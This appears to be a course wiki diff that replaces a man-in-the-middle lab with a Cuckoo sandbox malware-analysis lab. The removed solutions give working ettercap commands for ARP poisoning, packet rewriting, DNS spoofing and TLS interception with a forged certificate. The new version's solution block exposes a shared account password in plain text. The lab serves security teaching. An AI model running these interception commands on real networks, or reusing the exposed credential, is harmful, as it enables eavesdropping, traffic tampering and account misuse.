Differences
This shows you the differences between two versions of the page.
|
cdci:labs:4 [2020/05/15 17:07] mihai.chiroiu |
cdci:labs:4 [2025/01/21 19:24] (current) mihai.chiroiu |
||
|---|---|---|---|
| Line 1: | Line 1: | ||
| - | ~~SHOWSOLUTION~~ | + | ====== Lab04. Cuckoo sandboxing ====== |
| - | ====== Lab04. Man-in-the-middle attack ====== | + | ===== Objectives ===== |
| - | <note warning> | + | * Investigate a possible malware using automatic tools |
| - | Important read to be graded! | + | * Use the cuckoo sandbox automated malware analysis system |
| - | {{page>:cdci:rec&nofooter&noeditbutton&noheader}} | + | * Introduction to basic Linux command line |
| - | </note> | + | |
| - | ===== Objectives ===== | ||
| - | * MITM using ettercap tool | ||
| - | * Wireshark usage for protocol dissection - DNS | ||
| - | * Understanding attacks on ARP | ||
| - | * Learning different types of MITM | ||
| ===== Topology ===== | ===== Topology ===== | ||
| - | {{ :cdci:labs:cdci_lab04-mitm-topology.png?direct&600 |}} | + | For this exercise you will need the [[https://drive.google.com/open?id=11WTT3NYUfVk7UopVnUc-uf9SKgvzIcOf |malware archive]]. |
| + | You will also need a Linux environment with Cuckoo sandbox installed and a running Windows VM. One can be downloaded from [[ https://drive.google.com/file/d/14-7DqZ1jNKuqxr73Wk8TcTylRl7tNKNk/view?usp=sharing | here]]. | ||
| ===== Tasks ===== | ===== Tasks ===== | ||
| - | ==== 01. [5p] Virtual machine setup ==== | + | ==== 01. [10p] Virtual machine setup ==== |
| - | First, make sure that your virtual machine is updated (run the provided update.sh script, or create one). | + | You will need to have Linux VM (we have tested with Ubuntu 20.04) and then install the [[https://cuckoo.readthedocs.io/en/latest/installation/host/installation/ | Cuckoo sandbox on top of it]]. You can access Cuckoo sandbox from a browser, and to limit the impact of the malware analysis process please do so from the same VM (i.e. install a graphical server and a browser on the Linux VM). |
| - | Next, in one terminal start the provided Mininet topology. | ||
| <code> | <code> | ||
| - | root@cdci:/# cd cdci/lab04 | + | $startx (to start the graphical interface) |
| - | root@cdci:/# /usr/bin/python3 topology.py | + | |
| </code> | </code> | ||
| - | If there are any problems with starting the topology (if all is good you should see the Mininet prompt ">") use the given cleanup script and try to restart the topology. | + | After the installation you need to power on the cuckoo sandbox system using the following commands. To verify that cuckoo sandboxing is running open the [[http://127.0.0.1:8000 | hxxp://127.0.0.1:8000]] into a browser. |
| - | + | ||
| - | ==== 02. [5p] Internet connectivity ==== | + | |
| - | + | ||
| - | Before you begin, make sure that you have Internet connectivity on all two nodes (attacker and victim). R1 should be the gateway for the Attacker and Victim. Write down the MAC and IP addresses of all 3 nodes (including the gateway). Use the provided scripts to access the nodes. | + | |
| <code> | <code> | ||
| - | root@ip-172-30-0-165:/# ./attacker_bash.sh | + | $cuckoo web runserver |
| - | root@attacker:/# | + | $cuckoo -d (!!! do not run as sudo) |
| - | + | ||
| - | root@ip-172-30-0-165:/# ./victim_bash.sh | + | |
| - | root@victim:/# | + | |
| </code> | </code> | ||
| - | ==== 03. [30p] ARP poisoning MITM attack ==== | + | Next, inside your Linux VM one needs to run a second VM with Windows. This one is used by the Cuckoo framework to do the automatic malware analysis. Follow the tutorials available and make sure that the Windows VM is available. In the case of misconfigured guest VM (i.e., the Windows 7 VirtualBox VM), you can reset it to the initial configuration. [[https://cuckoo.readthedocs.io/en/latest/installation/guest/saving/|1]] |
| + | - Delete any existing snapshots. | ||
| + | - Power on the virtual machine. | ||
| + | - Create a new snapshot <code> VBoxManage snapshot "win7cuckoo" take "original" --pause </code> | ||
| + | - Power of the virtual machine <code> VBoxManage controlvm "win7cuckoo" poweroff </code> | ||
| + | - Restore the virtual machine to use the previously created snapshot. <code> VBoxManage snapshot "win7cuckoo" restorecurrent </code> | ||
| - | The goal of this exercise is to pass all the victim's traffic through the attacker's machine. From the Attacker node start an ARP poisoning mitm attack against the Victim machine using ettercap tool. Use “ping” tool from Victim and make sure that all traffic (including to outside) goes through the Attacker’s node (use extra verbose option for ettercap). | + | All this setup is already done in the following VM [[https://drive.google.com/file/d/14-7DqZ1jNKuqxr73Wk8TcTylRl7tNKNk/view?usp=sharing]] |
| - | <note tip> | + | ==== 02. [30p] Malware analysis ==== |
| - | Make sure that you enable remote sniffing. To exit ettercap simply press Q. | + | |
| - | </note> | + | |
| - | Use tcpdump to save all the traffic from the victim and analyze it using Wireshark. Try to answer the following questions: | + | To start the malware investigation, submit the received files using the dashboard and select Analyze from the “Configure your Analysis” page. Please configure a 500 seconds Timeout to allow enough time for execution and make sure that the package type is “exe” from the left-side panel for a proper lunch. |
| - | * Can you spot the Gratuitous ARP packet sent when infecting the victim? | + | |
| - | * Look into the layer 2 of the packets and see how the destination MAC address has changed under the attack. | + | |
| - | * Can you spot the Gratuitous ARP packet when the infection is stopped? | + | |
| - | <solution> | + | * Once the process has started, you should be able to see the progress in the terminal where the cuckoo daemon was lunched. Moreover, the Windows 7 pre-configured virtual machine should be started, and the malware launched. |
| - | <code> | + | {{ :cdci:labs:cdci_lab02_cuckoo-sandbox-vm.jpg?direct&600 |}} |
| - | root@attacker:/# ettercap -E -T -M ARP:remote /192.168.16.100// /192.168.16.1// | + | * Observe that the python agent within the Windows 7 has launched the malware and is monitoring it. You should also be able to see the random mouse movements. Why is this happening? |
| - | ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team | + | ==== 03. [20p] Report overview ==== |
| - | Listening on: | + | After the report has been generated, you should be able to answer the following questions. |
| - | attacker-eth0 -> FE:14:85:E7:5F:D0 | + | |
| - | 192.168.16.2/255.255.255.0 | + | |
| - | * |==================================================>| 100.00 % | + | |
| - | [...] | + | |
| - | Sat Mar 14 20:39:26 2020 [835705] | + | - What is the executable file format? What is the Original Filename of the executable? |
| - | D2:5D:2C:AD:D4:F5 --> FE:14:85:E7:5F:D0 | + | - What is the hash (preferable SHA2 family) of the malware? Can you find it on [[http://www.virustotal.com | hxxp://www.virustotal.com]]? |
| - | 192.168.16.100:0 --> 8.8.8.8:0 | P (0) | + | - What command is executed to allow access to all files? |
| - | + | - Which DNS records are recorded during the analysis? | |
| - | + | - What registry entries does the malware add? | |
| - | root@attacker:/# tcpdump -n -i Attacker-eth0 -w mitm.pcap | + | |
| - | </code> | + | |
| - | </solution> | + | |
| - | ==== 04. [10p] Traffic dissection ==== | + | ==== 04. [30p] More result analysis ==== |
| - | Investigate the following traffic as it is generated by the Victim node: | + | All the monitored actions are stored by Cuckoo in the “.cuckoo” configuration folder under the storage directory. |
| - | * HTTP and DNS while under MITM attack. Can you use Wireshark and rebuild/export the HTML pages that the victim opened (use wget or curl)?. | + | * Find in what languages is the support message from the malware available. |
| + | * Which files were encrypted during the process? | ||
| + | * Have a look at the captured traffic using Wireshark. | ||
| - | <note tip> | + | ==== 05. [10p] Custom rules for automated analysis ==== |
| - | Transfer the pcap file to your local computer and open it in wireshark. Then select File->Export HTML Objects. | + | |
| - | </note> | + | |
| - | ==== 05. [20p] Raw packets altering ==== | + | Cuckoo sandbox has a lot of extra tools that it can use for deeper analysis, including snort IDS, IDA for binary or Yara for signature matching. The Yara rules can be run against the binary itself, against the memory dump or accessed URLs. In this exercise we are going to use the Yara rules available on the following github [[https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_MS17-010_Wannacrypt.yar | repository]]. Just copy them in the yara configuration directory and re-run the analysis. |
| - | Ettercap filters can also be used to modify packets as they pass through the attacker’s node. Use the provided filter to change icmp type from echo to reply (Hint: [[https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml]]). | + | ==== 06. [Bonus 10p] Custom rules for automated analysis ==== |
| - | * You should observe the changes on the victim (no more replies). | + | |
| - | * Use tcpdump on the attacker to inspect the changes. | + | |
| - | <note tip> | + | Redo the analysis using the https://any.run/ platform. |
| - | [[https://linux.die.net/man/8/etterfilter]] | + | |
| - | </note> | + | |
| - | + | ||
| - | <code> | + | |
| - | cat icmp.filter | + | |
| - | if (ip.proto == ICMP) { | + | |
| - | msg("Changing ICMP type!\n"); | + | |
| - | replace("8.8.8.8", "8.8.4.4"); | + | |
| - | } | + | |
| - | etterfilter icmp.filter -o icmp.ef | + | |
| - | </code> | + | |
| <solution> | <solution> | ||
| - | <code> | + | For any.run use the student.cdci@totococo.fr.nf / "2YGt@pS5TtqUEkS" account |
| - | cat icmp.filter | + | |
| - | if (ip.proto == ICMP && icmp.type == 0) { | + | |
| - | msg("Changing address!\n"); | + | |
| - | icmp.type = 8; | + | |
| - | } | + | |
| - | etterfilter icmp.filter -o icmp.ef | + | |
| - | ettercap -T -F icmp.ef -M ARP:remote /192.168.16.100// /192.168.16.1// | + | |
| - | </code> | + | |
| - | </solution> | + | |
| - | + | ||
| - | + | ||
| - | + | ||
| - | ==== 06. [10p] DNS traffic altering ==== | + | |
| - | + | ||
| - | Another interesting plugin of Ettercap is DNS spoofing. Config it such that any queries for the “facebook.com” domain name are translated into “127.0.0.1”. | + | |
| - | + | ||
| - | <note tip> | + | |
| - | [[https://linux.die.net/man/8/ettercap_plugins]] | + | |
| - | </note> | + | |
| - | + | ||
| - | <solution> | + | |
| - | <code> | + | |
| - | root@attacker:~# cat /etc/ettercap/etter.dns | + | |
| - | www.facebook.com A 127.0.0.1 | + | |
| - | root@attacker:/# ettercap -P dns_spoof -E -T -M ARP:remote /192.168.16.100// /192.168.16.1// | + | |
| - | + | ||
| - | Listening on: | + | |
| - | attacker-eth0 -> 1E:D4:8A:37:43:CD | + | |
| - | 192.168.16.2/255.255.255.0 | + | |
| - | * |==================================================>| 100.00 % | + | |
| - | Activating dns_spoof plugin... | + | |
| - | + | ||
| - | Sat Mar 14 21:22:44 2020 [161164] | + | |
| - | CE:82:B8:0E:6B:72 --> 1E:D4:8A:37:43:CD | + | |
| - | UDP 192.168.16.100:48445 --> 172.30.0.2:53 | (34) | + | |
| - | A............www.facebook.com.....dns_spoof: A [www.facebook.com] spoofed to [127.0.0.1] TTL [3600 s] | + | |
| - | + | ||
| - | + | ||
| - | root@victim:/# nslookup www.facebook.com | + | |
| - | Non-authoritative answer: | + | |
| - | www.facebook.com canonical name = star-mini.c10r.facebook.com. | + | |
| - | Name: star-mini.c10r.facebook.com | + | |
| - | Address: 157.240.221.35 | + | |
| - | [...] | + | |
| - | root@victim:/# nslookup www.facebook.com | + | |
| - | Name: www.facebook.com | + | |
| - | Address: 127.0.0.1 | + | |
| - | </code> | + | |
| - | </solution> | + | |
| - | ==== 07. [20p] HTTPS traffic inspection ==== | + | |
| - | + | ||
| - | Unfortunately, HTTPS traffic cannot be inspected, or can it :). We will try to use ettercap and observe changes in the certificate chain when MITM attack is active. | + | |
| - | * First, use the “openssl s_client” tool (or other) to see the certificates path for the “www.google.com” website. <code> root@victim:~# openssl s_client -showcerts www.google.com:443 | + | |
| - | CONNECTED(00000005) | + | |
| - | depth=2 OU = GlobalSign Root CA - R2, O = GlobalSign, CN = GlobalSign | + | |
| - | verify return:1 | + | |
| - | depth=1 C = US, O = Google Trust Services, CN = GTS CA 1O1 | + | |
| - | verify return:1 | + | |
| - | depth=0 C = US, ST = California, L = Mountain View, O = Google LLC, CN = www.google.com | + | |
| - | verify return:1 | + | |
| - | </code> | + | |
| - | * Next, run ettercap without TLS MITM (-S). | + | |
| - | * Now, run ettercap including TLS MITM. | + | |
| - | + | ||
| - | <note tip> | + | |
| - | For the TLS MITM you will require a certificate and a private key to be used when running ettercap (hint: [[https://manpages.debian.org/jessie/ettercap-common/ettercap.8.en.html|--certificate]]). Use the following code to create the private key and certificate. | + | |
| - | <code> | + | |
| - | root@attacker:~# openssl genrsa -out hacker.pem 2048 | + | |
| - | root@attacker:~# openssl req -x509 -new -key hacker.pem -sha256 -days 365 -out hacker.crt | + | |
| - | </code> | + | |
| - | </note> | + | |
| - | + | ||
| - | <note tip> | + | |
| - | For the MITM TLS attack we have to allow ettercap to run as root user and enable iptables configurations. This is required to allow ettercap SSL filter to receive and decode the TLS traffic. Modify the configuration file, “/etc/ettercap/etter.conf”, with the following. | + | |
| - | <code> | + | |
| - | ec_uid = 0 | + | |
| - | ec_gid = 0 | + | |
| - | # if you use iptables: | + | |
| - | redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" | + | |
| - | redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" | + | |
| - | redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport" | + | |
| - | redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport" | + | |
| - | </code> | + | |
| - | </note> | + | |
| - | + | ||
| - | <solution> | + | |
| - | <code> | + | |
| - | root@attacker:~# ettercap -E -T -M ARP:remote --private-key hacker.pem --certificate hacker.crt /192.168.16.100// /192.168.16.1// | + | |
| - | + | ||
| - | + | ||
| - | root@victim:~# openssl s_client -showcerts www.google.com:443 | + | |
| - | CONNECTED(00000005) | + | |
| - | depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd | + | |
| - | verify error:num=18:self signed certificate | + | |
| - | verify return:1 | + | |
| - | depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd | + | |
| - | verify return:1 | + | |
| - | --- | + | |
| - | </code> | + | |
| </solution> | </solution> | ||
